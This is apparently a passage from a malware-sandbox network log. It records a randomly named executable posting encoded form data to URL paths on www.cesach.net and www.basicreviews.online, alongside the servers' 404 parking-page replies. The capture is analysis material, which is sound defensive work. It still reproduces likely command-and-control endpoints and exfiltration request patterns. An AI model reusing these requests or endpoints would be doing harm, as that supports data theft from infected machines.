                                                                                                                                                                              Data Raw: 37 38 3d 46 6a 6e 76 53 31 58 48 45 44 5a 6f 2b 74 44 59 45 33 54 44 66 36 52 37 6e 31 71 68 43 6b 7a 37 6e 6b 66 2b 67 6c 5a 56 75 67 4f 4b 41 31 4b 6c 78 56 2b 51 67 6f 41 71 65 73 58 54 44 38 35 47 71 6d 39 32 37 75 4b 34 6e 58 76 6d 72 6f 36 50 39 66 44 46 6d 45 4a 4f 56 6c 64 65 59 51 63 73 55 45 56 6f 34 5a 64 6a 41 47 36 4a 62 44 44 54 32 44 57 63 33 62 50 61 37 6b 53 33 64 37 65 4f 4a 48 73 61 31 73 70 47 31 4c 56 4f 54 44 44 4f 46 33 64 4e 4e 78 35 6f 34 32 42 69 73 37 49 4f 4e 43 57 7a 6e 39 62 5a 77 6b 49 51 39 52 34 48 31 56 78 7a 72 75 62 4e 42 33 34 37 62 36 64 4b 34 62 57 77 39 6f 50 4b 73 49 6d 34 32 79 63 74 33 35 65 55 4b 43 55 3d
                                                                                                                                                                              Data Ascii: 78=FjnvS1XHEDZo+tDYE3TDf6R7n1qhCkz7nkf+glZVugOKA1KlxV+QgoAqesXTD85Gqm927uK4nXvmro6P9fDFmEJOVldeYQcsUEVo4ZdjAG6JbDDT2DWc3bPa7kS3d7eOJHsa1spG1LVOTDDOF3dNNx5o42Bis7IONCWzn9bZwkIQ9R4H1VxzrubNB347b6dK4bWw9oPKsIm42yct35eUKCU=
                                                                                                                                                                              Oct 31, 2024 01:40:15.514626026 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:15 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim604
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:15.514656067 CET1236INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL-->
                                                                                                                                                                              Oct 31, 2024 01:40:15.514667034 CET1236INData Raw: 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e 53 41 20 53 4f 4c 55 54 49 4f 4e 53
                                                                                                                                                                              Data Ascii: m/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p>
                                                                                                                                                                              Oct 31, 2024 01:40:15.514676094 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https:/
                                                                                                                                                                              Oct 31, 2024 01:40:15.514688969 CET1236INData Raw: 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 6f 6e 20 66 75 6e 63 69 6f 6e 61 6c
                                                                                                                                                                              Data Ascii: </h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver m&aacute;s</button> </article></a>--> </div> </div></section><section cl
                                                                                                                                                                              Oct 31, 2024 01:40:15.514710903 CET860INData Raw: 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 6c 6f 77 65
                                                                                                                                                                              Data Ascii: <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>Facebook</a>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              39192.168.2.450046217.76.156.252803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:17.211189985 CET10806OUTPOST /dma3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.cesach.net
                                                                                                                                                                              Referer: http://www.cesach.net/dma3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 46 6a 6e 76 53 31 58 48 45 44 5a 6f 2b 74 44 59 45 33 54 44 66 36 52 37 6e 31 71 68 43 6b 7a 37 6e 6b 66 2b 67 6c 5a 56 75 67 47 4b 42 41 65 6c 77 32 6d 51 6d 59 41 71 66 73 58 53 44 38 35 68 71 69 52 79 37 75 47 43 6e 56 6e 6d 78 4e 75 50 30 4c 58 46 6f 45 4a 4f 61 46 64 66 46 67 64 73 55 45 46 73 34 64 78 6a 41 47 36 4a 62 43 7a 54 31 58 36 63 6b 4c 50 5a 73 55 53 42 5a 37 65 32 4a 48 6b 4b 31 73 74 34 31 37 31 4f 55 6a 54 4f 47 46 31 4e 4f 52 35 71 78 6d 42 71 73 37 4d 56 4e 43 4b 2f 6e 39 48 33 77 6e 55 51 75 30 5a 68 6f 56 4d 73 77 39 2f 71 61 33 49 62 61 61 39 77 39 5a 75 32 73 4c 6a 31 2b 70 36 33 37 6a 4d 6e 69 4c 65 6a 66 43 68 6f 55 2f 4d 32 43 41 4a 71 6d 32 67 4e 73 51 2f 71 49 62 34 72 6d 50 41 53 47 32 34 58 78 53 49 30 6c 41 68 50 76 4c 2f 44 6c 42 31 2b 72 4d 2b 52 63 53 73 72 43 35 6e 30 39 69 4d 59 69 31 46 5a 2f 69 4f 67 32 6d 68 47 57 37 79 42 63 49 68 4e 58 46 50 6b 66 70 39 51 45 72 75 51 39 59 67 67 64 65 33 48 33 41 69 50 38 61 31 39 41 34 62 2f 37 56 53 50 43 4f 70 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=FjnvS1XHEDZo+tDYE3TDf6R7n1qhCkz7nkf+glZVugGKBAelw2mQmYAqfsXSD85hqiRy7uGCnVnmxNuP0LXFoEJOaFdfFgdsUEFs4dxjAG6JbCzT1X6ckLPZsUSBZ7e2JHkK1st4171OUjTOGF1NOR5qxmBqs7MVNCK/n9H3wnUQu0ZhoVMsw9/qa3Ibaa9w9Zu2sLj1+p637jMniLejfChoU/M2CAJqm2gNsQ/qIb4rmPASG24XxSI0lAhPvL/DlB1+rM+RcSsrC5n09iMYi1FZ/iOg2mhGW7yBcIhNXFPkfp9QEruQ9Yggde3H3AiP8a19A4b/7VSPCOpJu1LAfbAiT/Cfbb136Q2GWVK/M9+JTIUiDhEUDJWdLlU2P+pmSvWAURpvEjst0FpjHGCa/A38TrdwqkZG77s9MnApXmt4Ahao1bXTk/aN1Nh/H1mP9b4T3GmaRXQd6CQnipvf58purtJbsB6Ymptp4mj5o0kwJgk6++atE0lBhYghCzbqgzzcob9JTXXmRmtuet1zBhgPOiXgUTumwa65tqYeFAMI5rVh5tk6g9g5IxMbXekdxrzpqlVPUSjBcm45Z3fZ3/9G4XQuPjYZpQ7wgBv6JJM0vAkppH/UVp+d5RmcBTcRR7ALAGx73as7jYzU25wuWsAQsiqNcrFF2P9DZceTi4pOIxXhsGZSjE/kLxC1Ey+1sGwYbCVfP1jC50YuuCWwbhuy1OnLp7/KVPyKpYVi3FZ83WyUaNcEPFwa04YvKaI0A4nZns2+3qJqRAEkUChzlEEVcAUG8DszZ5P3aqrBSuchalX0gDXciC+3zk9hXdrLHVUAsJMSC7+Ogsx39tFfyYZCAr4x2a1iBsaWG1wOD0P3liwsTNtVOezmfnaokRMJaj7v9BbPwa8rcbU/AM7ZzKh/dUYhfymlGzxapWNeIwjE8m+kBZ7/UUJRnVXZoDZVZS8jYKhXyYpj6US6glCUji/9AnbVCqDW9uNC0/5wDxQec9MBV [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:18.090936899 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:17 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim603
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:18.090948105 CET212INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
                                                                                                                                                                              Oct 31, 2024 01:40:18.090960979 CET1236INData Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d
                                                                                                                                                                              Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
                                                                                                                                                                              Oct 31, 2024 01:40:18.090966940 CET1236INData Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
                                                                                                                                                                              Oct 31, 2024 01:40:18.090972900 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 77 65 62 2e 70 6e 67 22 3e 0d 0a 20
                                                                                                                                                                              Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propia p&aacute;gina web de forma profesional y de una manera r&aacute;pida y s
                                                                                                                                                                              Oct 31, 2024 01:40:18.090977907 CET636INData Raw: 3c 2f 64 69 76 3e 0d 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6d 70 6c 65 78 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 65 6e 73 61 73 6f 6c 75
                                                                                                                                                                              Data Ascii: </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosblock"> <span>Registro de dominios</span> <p>Te ofrecemos si
                                                                                                                                                                              Oct 31, 2024 01:40:18.091100931 CET1236INData Raw: 52 4c 20 66 69 6a 61 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 46 69 6c 74 72 6f 20 41 6e 74 69 73 70 61 6d 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: RL fija</li> <li><i class="icon-ok"></i> Filtro Antispam</li> <li><i class="icon-ok"></i> 5 Cuentas de correo redirigido</li> </ul> </a></section><footer> <a class="logo" href="https://www.piens
                                                                                                                                                                              Oct 31, 2024 01:40:18.091147900 CET12INData Raw: 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: html>0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              40192.168.2.450047217.76.156.252803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:19.751441956 CET449OUTGET /dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.cesach.net
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:40:20.624912977 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:20 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              X-ServerIndex: llim605
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 1a9b<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.cesach.net</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:40:20.624928951 CET1236INData Raw: 3c 68 31 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e
                                                                                                                                                                              Data Ascii: <h1>www.cesach.net</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL-->
                                                                                                                                                                              Oct 31, 2024 01:40:20.624938011 CET1236INData Raw: 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e 53 41 20 53 4f 4c 55 54 49 4f 4e 53
                                                                                                                                                                              Data Ascii: m/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p>
                                                                                                                                                                              Oct 31, 2024 01:40:20.624989033 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <button>ver m&aacute;s</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https:/
                                                                                                                                                                              Oct 31, 2024 01:40:20.625000954 CET1236INData Raw: 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 6f 6e 20 66 75 6e 63 69 6f 6e 61 6c
                                                                                                                                                                              Data Ascii: </h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver m&aacute;s</button> </article></a>--> </div> </div></section><section cl
                                                                                                                                                                              Oct 31, 2024 01:40:20.625010967 CET860INData Raw: 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 20 63 6c 61 73 73 3d 22 6c 6f 77 65
                                                                                                                                                                              Data Ascii: <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>Facebook</a>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              41192.168.2.450048144.76.190.39803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:40:25.839320898 CET731OUTPOST /3xn5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.basicreviews.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.basicreviews.online
                                                                                                                                                                              Referer: http://www.basicreviews.online/3xn5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 4a 2f 62 2f 49 4b 58 52 70 43 6c 31 68 78 44 4d 67 6c 77 68 2f 33 66 39 6e 2f 33 54 36 52 35 52 51 4a 30 4c 52 55 50 67 45 6b 43 54 37 45 35 32 35 2b 79 41 76 43 46 63 6a 55 67 55 56 47 69 71 77 6c 51 55 35 5a 75 32 2b 59 30 76 6b 49 31 35 6a 53 31 68 41 6f 39 63 58 39 70 61 31 33 39 57 65 34 42 66 6d 50 50 74 78 33 36 7a 5a 56 39 2f 57 51 2f 39 2b 71 47 6c 44 6b 79 63 43 31 38 54 42 37 68 71 74 4d 4e 4c 78 66 4a 75 71 49 65 5a 51 56 6a 4f 57 6a 57 57 64 77 38 42 55 34 72 63 37 37 57 63 33 2f 46 38 6f 7a 59 6b 67 62 43 6d 77 41 36 4b 74 79 71 2f 72 74 31 4a 2f 5a 37 58 51 3d 3d
